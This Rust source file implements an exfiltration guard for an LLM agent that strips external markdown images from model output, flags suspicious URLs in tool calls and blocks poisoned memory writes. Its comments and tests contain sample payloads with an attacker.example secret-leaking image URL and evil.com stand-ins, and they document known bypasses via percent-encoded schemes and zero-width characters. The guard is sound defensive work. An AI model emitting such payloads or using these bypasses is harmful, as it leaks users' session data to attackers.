zeph_sanitizer/exfiltration.rs
1// SPDX-FileCopyrightText: 2026 Andrei G <bug-ops>
2// SPDX-License-Identifier: MIT OR Apache-2.0
3
4//! Exfiltration guards: prevent LLM-generated content from leaking data via
5//! outbound channels (markdown images, tool URL injection, poisoned memory writes).
6//!
7//! The [`ExfiltrationGuard`] is stateless and covers three attack vectors:
8//!
//! 1. **Markdown image exfiltration** — an adversary plants
//!    `![alt](https://attacker.example/pixel.gif?data=<secret>)` in content. When the LLM echoes
//!    it, the rendered image loads silently, leaking session data.
11//! [`ExfiltrationGuard::scan_output`] strips these and replaces them with `[image removed: …]`.
12//!
13//! 2. **URL injection via tool calls** — a flagged URL from untrusted tool output appears in a
14//! subsequent tool call argument. [`ExfiltrationGuard::validate_tool_call`] cross-references
15//! URLs against the per-turn flagged URL set. Flag-only approach (does not block execution).
16//!
17//! 3. **Poisoned memory writes** — content flagged with injection patterns is intercepted before
18//! Qdrant embedding. [`ExfiltrationGuard::should_guard_memory_write`] signals the caller to
19//! skip the embedding step, preventing poisoned content from polluting semantic search.
20//!
21//! # Phase 5 TODO
22//! - HTML img tag detection (`<img src="https://...">`) — requires HTML parser
//! - Unicode zero-width character bypass (e.g. a zero-width space: `!\u{200B}[alt](url)`) — requires Unicode-aware matching
24//! - Both are low-priority: the LLM context wrapper already limits what arrives here
25
26use std::collections::HashSet;
27use std::fmt::Write as _;
28use std::sync::LazyLock;
29
30use regex::Regex;
31use zeph_common::ToolName;
32
33pub use zeph_config::ExfiltrationGuardConfig;
34
35// ---------------------------------------------------------------------------
36// Regex patterns
37// ---------------------------------------------------------------------------
38
/// Matches inline markdown images with external http/https URLs:
/// `![alt](https://example.com/img.png)`.
///
/// Capture group 1 is the alt text (may be empty), group 2 is the URL up to the
/// first `)`. The scheme must appear literally as `http://` or `https://`.
///
/// Local paths (`./img.png`) and data URIs (`data:image/...`) are intentionally
/// excluded — they cannot exfiltrate data to a remote server.
static MARKDOWN_IMAGE_RE: LazyLock<Regex> = LazyLock::new(|| {
    Regex::new(r"!\[([^\]]*)\]\((https?://[^)]+)\)").expect("valid MARKDOWN_IMAGE_RE")
});

/// Matches reference-style markdown image declarations: `[ref]: https://example.com/img`
///
/// Multi-line mode: the definition must start at the beginning of a line. Capture
/// group 1 is the label, group 2 the URL (up to the next whitespace).
/// Used in conjunction with `REFERENCE_USAGE_RE` to detect two-part reference images.
static REFERENCE_DEF_RE: LazyLock<Regex> = LazyLock::new(|| {
    Regex::new(r"(?m)^\[([^\]]+)\]:\s*(https?://\S+)").expect("valid REFERENCE_DEF_RE")
});

/// Matches reference-style image usages: `![alt][ref]`
///
/// Capture group 1 is the alt text, group 2 the (non-empty) reference label.
static REFERENCE_USAGE_RE: LazyLock<Regex> =
    LazyLock::new(|| Regex::new(r"!\[([^\]]*)\]\[([^\]]+)\]").expect("valid REFERENCE_USAGE_RE"));

/// Extracts http/https URLs from arbitrary text (used for tool argument scanning).
///
/// A URL runs until the first whitespace, quote (`"` or `'`) or angle bracket, so
/// trailing punctuation such as `,` or `)` is part of the match.
static URL_EXTRACT_RE: LazyLock<Regex> =
    LazyLock::new(|| Regex::new(r#"https?://[^\s"'<>]+"#).expect("valid URL_EXTRACT_RE"));
61
62// ---------------------------------------------------------------------------
63// Event types
64// ---------------------------------------------------------------------------
65
/// An exfiltration event detected by [`ExfiltrationGuard`].
///
/// Events are advisory: they are logged, counted, and returned to the caller for
/// further action. The guard itself never panics or blocks the agent loop.
///
/// # Examples
///
/// ```rust
/// use zeph_sanitizer::exfiltration::{ExfiltrationGuard, ExfiltrationEvent};
/// use zeph_config::ExfiltrationGuardConfig;
///
/// let guard = ExfiltrationGuard::new(ExfiltrationGuardConfig::default());
/// let (cleaned, events) = guard.scan_output("![img](https://evil.com/steal.png)");
/// assert_eq!(events.len(), 1);
/// assert!(matches!(&events[0], ExfiltrationEvent::MarkdownImageBlocked { url } if url.contains("evil.com")));
/// ```
#[derive(Debug, Clone, PartialEq)]
pub enum ExfiltrationEvent {
    /// A markdown image with an external URL was stripped from LLM output.
    /// `url` is the image target that was removed.
    MarkdownImageBlocked { url: String },
    /// A tool call argument contained a URL that appeared in untrusted flagged content.
    /// `url` is the matching URL and `tool_name` the tool whose arguments contained it.
    SuspiciousToolUrl { url: String, tool_name: ToolName },
    /// A memory write was intercepted because the content had injection flags.
    /// `reason` is a human-readable explanation.
    MemoryWriteGuarded { reason: String },
}
91
92// ---------------------------------------------------------------------------
93// Guard
94// ---------------------------------------------------------------------------
95
/// Stateless exfiltration guard covering three outbound leak vectors.
///
/// Construct once from [`ExfiltrationGuardConfig`] and store on the agent. Cheap to clone.
/// All three scanners ([`scan_output`](Self::scan_output),
/// [`validate_tool_call`](Self::validate_tool_call),
/// [`should_guard_memory_write`](Self::should_guard_memory_write)) are independently
/// toggled via the config flags `block_markdown_images`, `validate_tool_urls`, and
/// `guard_memory_writes`.
///
/// # Examples
///
/// ```rust
/// use zeph_sanitizer::exfiltration::ExfiltrationGuard;
/// use zeph_config::ExfiltrationGuardConfig;
///
/// let guard = ExfiltrationGuard::new(ExfiltrationGuardConfig::default());
///
/// // Strips external tracking pixels from LLM output.
/// let (cleaned, events) = guard.scan_output("text ![track](https://evil.com/pixel.gif) end");
/// assert!(events.len() == 1);
/// assert!(!cleaned.contains("![track]"));
///
/// // Memory write is guarded when injection flags are present.
/// let event = guard.should_guard_memory_write(true);
/// assert!(event.is_some());
/// ```
#[derive(Debug, Clone)]
pub struct ExfiltrationGuard {
    /// Feature toggles consulted by each scanner; the guard holds no other state.
    config: ExfiltrationGuardConfig,
}
126
127impl ExfiltrationGuard {
    /// Create a new guard from the given configuration.
    ///
    /// The configuration is stored as-is; no validation or other work is performed.
    ///
    /// # Examples
    ///
    /// ```rust
    /// use zeph_sanitizer::exfiltration::ExfiltrationGuard;
    /// use zeph_config::ExfiltrationGuardConfig;
    ///
    /// let guard = ExfiltrationGuard::new(ExfiltrationGuardConfig::default());
    /// ```
    #[must_use]
    pub fn new(config: ExfiltrationGuardConfig) -> Self {
        Self { config }
    }
142
143 /// Scan LLM output text and strip external markdown images.
144 ///
145 /// Returns the cleaned text and a list of [`ExfiltrationEvent::MarkdownImageBlocked`]
146 /// for each image that was removed.
147 ///
148 /// When `block_markdown_images` is `false`, returns the input unchanged.
149 ///
150 /// # Scanning coverage
151 /// - Inline images: ``
152 /// - Reference-style images: `![alt][ref]` + `[ref]: https://evil.com/img`
153 /// - Percent-encoded URLs inside already-captured groups: decoded before `is_external_url()`
154 ///
155 /// # Not covered (Phase 5, tracked in #1195)
156 /// - Percent-encoded scheme bypass: `%68ttps://evil.com` — the regex requires literal
157 /// `https?://`, so a percent-encoded scheme is never captured. Fix requires pre-decoding
158 /// the full input text before regex matching.
159 /// - HTML `<img src="...">` tags
160 /// - Unicode zero-width joiner tricks (`!\u{200B}[alt](url)`)
161 /// - Reference definitions inside fenced code blocks (false positive risk)
162 ///
163 /// # Panics
164 ///
165 /// Panics if the compiled regex does not produce expected capture groups (compile-time
166 /// guarantee — the regex patterns are validated via `expect` in `LazyLock` initializers).
167 #[must_use]
168 pub fn scan_output(&self, text: &str) -> (String, Vec<ExfiltrationEvent>) {
169 if !self.config.block_markdown_images {
170 return (text.to_owned(), vec![]);
171 }
172
173 let mut events = Vec::new();
174 let mut result = text.to_owned();
175
176 // --- Pass 1: inline images ---
177 let mut replacement = String::new();
178 let mut last_end = 0usize;
179 for cap in MARKDOWN_IMAGE_RE.captures_iter(text) {
180 let m = cap.get(0).expect("full match");
181 let raw_url = cap.get(2).expect("url group").as_str();
182 let url = percent_decode_url(raw_url);
183
184 if is_external_url(&url) {
185 replacement.push_str(&text[last_end..m.start()]);
186 let _ = write!(replacement, "[image removed: {url}]");
187 last_end = m.end();
188 events.push(ExfiltrationEvent::MarkdownImageBlocked { url });
189 }
190 }
191 if !events.is_empty() || last_end > 0 {
192 replacement.push_str(&text[last_end..]);
193 result = replacement;
194 }
195
196 // --- Pass 2: reference-style images ---
197 // Collect reference definitions from the (already partially cleaned) result.
198 let mut ref_defs: std::collections::HashMap<String, String> =
199 std::collections::HashMap::new();
200 for cap in REFERENCE_DEF_RE.captures_iter(&result) {
201 let label = cap.get(1).expect("label").as_str().to_lowercase();
202 let raw_url = cap.get(2).expect("url").as_str();
203 let url = percent_decode_url(raw_url);
204 if is_external_url(&url) {
205 ref_defs.insert(label, url);
206 }
207 }
208
209 if !ref_defs.is_empty() {
210 // Remove reference usages that point to external defs.
211 let mut cleaned = String::with_capacity(result.len());
212 let mut last_end = 0usize;
213 for cap in REFERENCE_USAGE_RE.captures_iter(&result) {
214 let m = cap.get(0).expect("full match");
215 let label = cap.get(2).expect("label").as_str().to_lowercase();
216 if let Some(url) = ref_defs.get(&label) {
217 cleaned.push_str(&result[last_end..m.start()]);
218 let _ = write!(cleaned, "[image removed: {url}]");
219 last_end = m.end();
220 events.push(ExfiltrationEvent::MarkdownImageBlocked { url: url.clone() });
221 }
222 }
223 cleaned.push_str(&result[last_end..]);
224 result = cleaned;
225
226 // Remove the reference definition lines for blocked refs.
227 // Use split('\n') (not .lines()) to preserve \r in CRLF line endings —
228 // .lines() strips \r, and reconstruction with push('\n') would silently
229 // convert all CRLF to LF throughout the entire text.
230 let mut def_cleaned = String::with_capacity(result.len());
231 for line in result.split('\n') {
232 let mut keep = true;
233 for cap in REFERENCE_DEF_RE.captures_iter(line) {
234 let label = cap.get(1).expect("label").as_str().to_lowercase();
235 if ref_defs.contains_key(&label) {
236 keep = false;
237 break;
238 }
239 }
240 if keep {
241 def_cleaned.push_str(line);
242 def_cleaned.push('\n');
243 }
244 }
245 // Preserve trailing newline behaviour of the original.
246 if !text.ends_with('\n') && def_cleaned.ends_with('\n') {
247 def_cleaned.pop();
248 }
249 result = def_cleaned;
250 }
251
252 (result, events)
253 }
254
255 /// Validate tool call arguments against a set of URLs flagged in untrusted content.
256 ///
257 /// Parses `args_json` as a JSON value and extracts all string leaves recursively to
258 /// avoid JSON-encoding bypasses (escaped slashes, unicode escapes, etc.).
259 ///
260 /// Returns one [`ExfiltrationEvent::SuspiciousToolUrl`] per matching URL.
261 /// When `validate_tool_urls` is `false`, always returns an empty vec.
262 ///
263 /// # Flag-only approach
264 /// Matching URLs are logged and counted but tool execution is NOT blocked. Blocking
265 /// would break legitimate workflows where the same URL appears in both a search result
266 /// and a subsequent fetch call. See design decision D1 in the architect handoff.
267 #[must_use]
268 pub fn validate_tool_call(
269 &self,
270 tool_name: &str,
271 args_json: &str,
272 flagged_urls: &HashSet<String>,
273 ) -> Vec<ExfiltrationEvent> {
274 if !self.config.validate_tool_urls || flagged_urls.is_empty() {
275 return vec![];
276 }
277
278 let parsed: serde_json::Value = match serde_json::from_str(args_json) {
279 Ok(v) => v,
280 Err(_) => {
281 // Fall back to raw regex scan if JSON is malformed.
282 return Self::scan_raw_args(tool_name, args_json, flagged_urls);
283 }
284 };
285
286 let mut events = Vec::new();
287 let mut strings = Vec::new();
288 collect_strings(&parsed, &mut strings);
289
290 for s in &strings {
291 for url_match in URL_EXTRACT_RE.find_iter(s) {
292 let url = url_match.as_str();
293 if flagged_urls.contains(url) {
294 events.push(ExfiltrationEvent::SuspiciousToolUrl {
295 url: url.to_owned(),
296 tool_name: tool_name.into(),
297 });
298 }
299 }
300 }
301
302 events
303 }
304
305 /// Check whether a memory write should skip Qdrant embedding.
306 ///
307 /// Returns `Some(MemoryWriteGuarded)` when `has_injection_flags` is `true` and
308 /// `guard_memory_writes` is enabled. The caller should still save to `SQLite` for
309 /// conversation continuity but omit the Qdrant embedding to prevent poisoned content
310 /// from polluting semantic search results.
311 ///
312 /// See design decision D2 in the architect handoff.
313 #[must_use]
314 pub fn should_guard_memory_write(
315 &self,
316 has_injection_flags: bool,
317 ) -> Option<ExfiltrationEvent> {
318 if !self.config.guard_memory_writes || !has_injection_flags {
319 return None;
320 }
321 Some(ExfiltrationEvent::MemoryWriteGuarded {
322 reason: "content contained injection patterns flagged by ContentSanitizer".to_owned(),
323 })
324 }
325
326 /// Extract URLs from untrusted tool output for use in subsequent `validate_tool_call` checks.
327 ///
328 fn scan_raw_args(
329 tool_name: &str,
330 args: &str,
331 flagged_urls: &HashSet<String>,
332 ) -> Vec<ExfiltrationEvent> {
333 URL_EXTRACT_RE
334 .find_iter(args)
335 .filter(|m| flagged_urls.contains(m.as_str()))
336 .map(|m| ExfiltrationEvent::SuspiciousToolUrl {
337 url: m.as_str().to_owned(),
338 tool_name: tool_name.into(),
339 })
340 .collect()
341 }
342}
343
344/// Extract all `http`/`https` URLs from `content` into a `HashSet` for later URL validation.
345///
346/// Call this after sanitizing untrusted tool output with `ContentSanitizer` when injection
347/// flags are present. Pass the returned set into the agent's `flagged_urls` field. Pass that
348/// set to [`ExfiltrationGuard::validate_tool_call`] on each subsequent tool call. Clear
349/// `flagged_urls` at the start of each `process_response` call (per-turn clearing strategy).
350///
351/// # Examples
352///
353/// ```rust
354/// use zeph_sanitizer::exfiltration::extract_flagged_urls;
355///
356/// let urls = extract_flagged_urls("visit https://evil.com/x and https://other.com/y");
357/// assert!(urls.contains("https://evil.com/x"));
358/// assert!(urls.contains("https://other.com/y"));
359/// assert_eq!(urls.len(), 2);
360/// ```
361#[must_use]
362pub fn extract_flagged_urls(content: &str) -> HashSet<String> {
363 URL_EXTRACT_RE
364 .find_iter(content)
365 .map(|m| m.as_str().to_owned())
366 .collect()
367}
368
369// ---------------------------------------------------------------------------
370// Helpers
371// ---------------------------------------------------------------------------
372
/// Decode percent-encoded URL characters before exfiltration matching.
///
/// Converts `%68ttps://` → `https://` so simple percent-encoding bypasses are caught.
///
/// Decoding happens at the byte level and the result is interpreted as UTF-8 once at the
/// end, so multi-byte characters survive both in raw form (`é`) and in escaped form
/// (`%C3%A9`). A `%` that is not followed by two hex digits is copied through unchanged.
/// Escapes that decode to bytes which are not valid UTF-8 are replaced with U+FFFD.
fn percent_decode_url(raw: &str) -> String {
    /// Numeric value of one ASCII hex digit, or `None` for any other byte.
    fn hex_value(byte: u8) -> Option<u8> {
        match byte {
            b'0'..=b'9' => Some(byte - b'0'),
            b'a'..=b'f' => Some(byte - b'a' + 10),
            b'A'..=b'F' => Some(byte - b'A' + 10),
            _ => None,
        }
    }

    let bytes = raw.as_bytes();
    let mut decoded = Vec::with_capacity(bytes.len());
    let mut i = 0;
    while i < bytes.len() {
        if bytes[i] == b'%' {
            // `get` keeps a truncated escape at the end of the input from panicking.
            let hi = bytes.get(i + 1).copied().and_then(hex_value);
            let lo = bytes.get(i + 2).copied().and_then(hex_value);
            if let (Some(hi), Some(lo)) = (hi, lo) {
                // Both nibbles are 0-15, so the combined value always fits in a u8.
                decoded.push((hi << 4) | lo);
                i += 3;
                continue;
            }
        }
        decoded.push(bytes[i]);
        i += 1;
    }
    String::from_utf8_lossy(&decoded).into_owned()
}
401
/// Report whether `url` points at a remote `http`/`https` resource.
///
/// The scheme comparison is ASCII case-insensitive (`HTTPS://…` counts as external)
/// because URI schemes are case-insensitive. Relative paths, `data:` URIs and every
/// other scheme return `false`.
fn is_external_url(url: &str) -> bool {
    let bytes = url.as_bytes();
    ["http://", "https://"].iter().any(|prefix| {
        // Compare bytes so a multi-byte character near the prefix boundary cannot panic.
        bytes
            .get(..prefix.len())
            .is_some_and(|head| head.eq_ignore_ascii_case(prefix.as_bytes()))
    })
}
405
406/// Recursively collect all string leaves from a JSON value.
407fn collect_strings<'a>(value: &'a serde_json::Value, out: &mut Vec<&'a str>) {
408 match value {
409 serde_json::Value::String(s) => out.push(s.as_str()),
410 serde_json::Value::Array(arr) => {
411 for v in arr {
412 collect_strings(v, out);
413 }
414 }
415 serde_json::Value::Object(map) => {
416 for v in map.values() {
417 collect_strings(v, out);
418 }
419 }
420 _ => {}
421 }
422}
423
424// ---------------------------------------------------------------------------
425// Tests
426// ---------------------------------------------------------------------------
427
/// Unit tests for the exfiltration guard: output scanning, tool-call URL validation,
/// memory-write guarding and the URL helpers.
#[cfg(test)]
mod tests {
    use super::*;

    /// Guard with the default configuration.
    fn guard() -> ExfiltrationGuard {
        ExfiltrationGuard::new(ExfiltrationGuardConfig::default())
    }

    /// Guard with every scanner switched off.
    fn guard_disabled() -> ExfiltrationGuard {
        ExfiltrationGuard::new(ExfiltrationGuardConfig {
            block_markdown_images: false,
            validate_tool_urls: false,
            guard_memory_writes: false,
        })
    }

    // --- scan_output ---

    #[test]
    fn strips_external_inline_image() {
        let (cleaned, events) =
            guard().scan_output("Before ![img](https://evil.com/p.gif) after");
        assert_eq!(
            cleaned,
            "Before [image removed: https://evil.com/p.gif] after"
        );
        assert_eq!(events.len(), 1);
        assert!(
            matches!(&events[0], ExfiltrationEvent::MarkdownImageBlocked { url } if url == "https://evil.com/p.gif")
        );
    }

    #[test]
    fn preserves_local_image() {
        let text = "Look: ![alt](./local.png) — local";
        let (cleaned, events) = guard().scan_output(text);
        assert_eq!(cleaned, text);
        assert!(events.is_empty());
    }

    #[test]
    fn preserves_data_uri() {
        let text = "Inline: ![img](data:image/png;base64,abc123)";
        let (cleaned, events) = guard().scan_output(text);
        assert_eq!(cleaned, text);
        assert!(events.is_empty());
    }

    #[test]
    fn strips_multiple_external_images() {
        let text = "![a](https://a.com/1.png) text ![b](https://b.com/2.png)";
        let (cleaned, events) = guard().scan_output(text);
        // Markdown image syntax must be removed; replacement label may contain URLs.
        assert!(
            !cleaned.contains("![a]("),
            "first image syntax must be removed: {cleaned}"
        );
        assert!(
            !cleaned.contains("![b]("),
            "second image syntax must be removed: {cleaned}"
        );
        assert_eq!(events.len(), 2);
    }

    #[test]
    fn scan_output_noop_when_disabled() {
        let text = "![img](https://evil.com/track.gif)";
        let (cleaned, events) = guard_disabled().scan_output(text);
        assert_eq!(cleaned, text);
        assert!(events.is_empty());
    }

    #[test]
    fn strips_reference_style_image() {
        let text = "Here is the image: ![alt][ref]\n[ref]: https://evil.com/track.gif\nend";
        let (cleaned, events) = guard().scan_output(text);
        // The markdown image syntax and definition line must be removed.
        assert!(
            !cleaned.contains("![alt][ref]"),
            "image usage syntax must be removed: {cleaned}"
        );
        assert!(
            !cleaned.contains("[ref]:"),
            "reference definition must be removed: {cleaned}"
        );
        assert!(
            cleaned.contains("[image removed:"),
            "replacement label must be present: {cleaned}"
        );
        assert!(!events.is_empty(), "must generate event");
    }

    #[test]
    fn preserves_local_reference_image() {
        // Reference pointing to a local path — must not be stripped.
        let text = "![alt][ref]\n[ref]: ./local.png\n";
        let (cleaned, events) = guard().scan_output(text);
        assert_eq!(cleaned, text);
        assert!(events.is_empty());
    }

    #[test]
    fn decodes_percent_encoded_url_in_inline_image() {
        // %68 = 'h', so %68ttps:// decodes to https://.
        // The MARKDOWN_IMAGE_RE pattern requires a literal `https?://` prefix, so
        // `%68ttps://` is NOT matched by the regex and passes through unchanged.
        // percent_decode_url() is called on the URL *after* the regex captures it —
        // so percent-encoded schemes bypass inline detection.
        //
        // Known bypass — tracked for Phase 5 (#1195): the fix requires pre-decoding the
        // full text before regex matching (or a multi-pass decode+scan approach). The LLM
        // context wrapper already limits what arrives here, reducing practical risk.
        let text = "![t](%68ttps://evil.com/track.gif)";
        let (cleaned, _events) = guard().scan_output(text);
        // The text passes through unchanged because the regex didn't match.
        assert_eq!(
            cleaned, text,
            "percent-encoded scheme not detected by inline regex"
        );

        // A normal https:// URL IS detected.
        let normal = "![t](https://evil.com/track.gif)";
        let (normal_cleaned, normal_events) = guard().scan_output(normal);
        assert!(
            !normal_cleaned.contains("![t]("),
            "normal URL must be removed"
        );
        assert_eq!(normal_events.len(), 1);
    }

    #[test]
    fn empty_alt_text_still_blocked() {
        let text = "![](https://evil.com/p.gif)";
        let (cleaned, events) = guard().scan_output(text);
        // The original markdown image syntax must be removed; the replacement label may contain the URL.
        assert!(
            !cleaned.contains("![]("),
            "markdown image syntax must be removed: {cleaned}"
        );
        assert!(
            cleaned.contains("[image removed:"),
            "replacement label must be present: {cleaned}"
        );
        assert_eq!(events.len(), 1);
    }

    // --- validate_tool_call ---

    #[test]
    fn detects_flagged_url_in_json_string() {
        let mut flagged = HashSet::new();
        flagged.insert("https://evil.com/payload".to_owned());
        let args = r#"{"url": "https://evil.com/payload"}"#;
        let events = guard().validate_tool_call("fetch", args, &flagged);
        assert_eq!(events.len(), 1);
        assert!(
            matches!(&events[0], ExfiltrationEvent::SuspiciousToolUrl { url, tool_name }
            if url == "https://evil.com/payload" && tool_name == "fetch")
        );
    }

    #[test]
    fn no_event_when_url_not_flagged() {
        let mut flagged = HashSet::new();
        flagged.insert("https://other.com/benign".to_owned());
        let args = r#"{"url": "https://legitimate.com/page"}"#;
        let events = guard().validate_tool_call("fetch", args, &flagged);
        assert!(events.is_empty());
    }

    #[test]
    fn validate_tool_call_noop_when_disabled() {
        let mut flagged = HashSet::new();
        flagged.insert("https://evil.com/x".to_owned());
        let args = r#"{"url": "https://evil.com/x"}"#;
        let events = guard_disabled().validate_tool_call("fetch", args, &flagged);
        assert!(events.is_empty());
    }

    #[test]
    fn validate_tool_call_noop_with_empty_flagged() {
        let args = r#"{"url": "https://evil.com/x"}"#;
        let events = guard().validate_tool_call("fetch", args, &HashSet::new());
        assert!(events.is_empty());
    }

    #[test]
    fn extracts_urls_from_nested_json() {
        let mut flagged = HashSet::new();
        flagged.insert("https://evil.com/deep".to_owned());
        let args = r#"{"nested": {"inner": ["https://evil.com/deep"]}}"#;
        let events = guard().validate_tool_call("tool", args, &flagged);
        assert_eq!(events.len(), 1);
    }

    #[test]
    fn handles_escaped_slashes_in_json() {
        // JSON-encoded URL with escaped forward slashes should still be detected
        // after serde_json parsing (which unescapes the string value).
        let mut flagged = HashSet::new();
        flagged.insert("https://evil.com/path".to_owned());
        // serde_json will unescape \/ → /
        let args = r#"{"url": "https:\/\/evil.com\/path"}"#;
        let parsed: serde_json::Value = serde_json::from_str(args).unwrap();
        // Confirm serde_json unescapes it.
        assert_eq!(parsed["url"], "https://evil.com/path");
        let events = guard().validate_tool_call("fetch", args, &flagged);
        assert_eq!(events.len(), 1, "JSON-escaped URL must be caught");
    }

    // --- should_guard_memory_write ---

    #[test]
    fn guards_when_injection_flags_set() {
        let event = guard().should_guard_memory_write(true);
        assert!(event.is_some());
        assert!(matches!(
            event.unwrap(),
            ExfiltrationEvent::MemoryWriteGuarded { .. }
        ));
    }

    #[test]
    fn passes_when_no_injection_flags() {
        let event = guard().should_guard_memory_write(false);
        assert!(event.is_none());
    }

    #[test]
    fn guard_memory_write_noop_when_disabled() {
        let event = guard_disabled().should_guard_memory_write(true);
        assert!(event.is_none());
    }

    // --- percent_decode_url ---

    #[test]
    fn percent_decode_roundtrip() {
        assert_eq!(
            percent_decode_url("https://example.com"),
            "https://example.com"
        );
        assert_eq!(
            percent_decode_url("%68ttps://example.com"),
            "https://example.com"
        );
        assert_eq!(percent_decode_url("hello%20world"), "hello world");
    }

    // --- extract_flagged_urls ---

    #[test]
    fn extracts_urls_from_plain_text() {
        let content = "check https://evil.com/x and https://other.com/y for details";
        let urls = extract_flagged_urls(content);
        assert!(urls.contains("https://evil.com/x"));
        assert!(urls.contains("https://other.com/y"));
    }
}